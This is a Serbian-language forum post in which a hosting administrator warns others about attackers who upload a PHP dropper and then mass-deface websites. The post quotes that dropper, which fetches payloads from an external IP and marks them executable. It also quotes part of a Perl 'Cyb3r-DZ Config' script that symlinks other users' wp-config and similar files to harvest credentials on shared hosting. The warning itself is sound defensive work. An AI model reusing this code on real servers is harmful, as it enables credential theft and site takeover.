Egipcani uploaduju neki blabla.php a u njemu se nalazi
<?php
$file = fopen(".htaccess" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/htaccess.txt');
$write = fwrite ($file ,$sa);
$file = fopen("user.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/user.txt');
$write = fwrite ($file ,$sa);
$file = fopen("cgi.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/cgi.txt');
$write = fwrite ($file ,$sa);
..... bla bla
fclose($file);
if ($write) {
echo "The File Was Created Successfuly";
}
else {echo"\"error\"";}
chmod("user.dz" , 0755);
chmod("user.dz" , 0755);
chmod("jeentel" , 0755);
chmod("dz.dz" , 0755);
chmod("config.dz" , 0755);
?>
Nadam se da svi kontaju sta ovaj fajl radi kada se pokrene. Potom pokren skinute fajlove primera radi
#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>[~] Cyb3r-DZ Config - [~] </title>
<style type="text/css">
.newStyle1 {
font-family: Tahoma;
font-size: x-small;
font-weight: bold;
color: #00FFFF;
text-align: center;
}
</style>
</head>
';
sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'-shop.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'-members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'-forum.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp13.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp-blog.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');
... bla bla something..
I urade deface na hrpu sajtova.
Ovakav problem zahteva sistemsko resenje pocev od servera. Ajmo admini dajte neke dobre predloge :)
Dakle ovo je samo administratorima da obrate paznju , ne korisnicima. Verovatno ovaj forum cita dosta ljudi ( nadam se i iz Verat-a, Eunet-a, Orion-a itd ) nemojte da nas prave blesavim ovakvi kvazi hakeri.
Generalno resenje za ove lazne porudzbe bi bila neka provera, najverodosnija je SMS potvrda porudzbe. Napisacu dodatak za poznati sistem za korisnike WHMCS koji ce preko clickatell-a slati neki random kod koji ce trebati da se unese posle porucivanja kako bi porudzba bila aktivna pa cu ga podeliti ovde a svi koji zele dalje da ga koriste moci ce gde god uspu da ga uglave.
Toliko za sada
Good night.
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------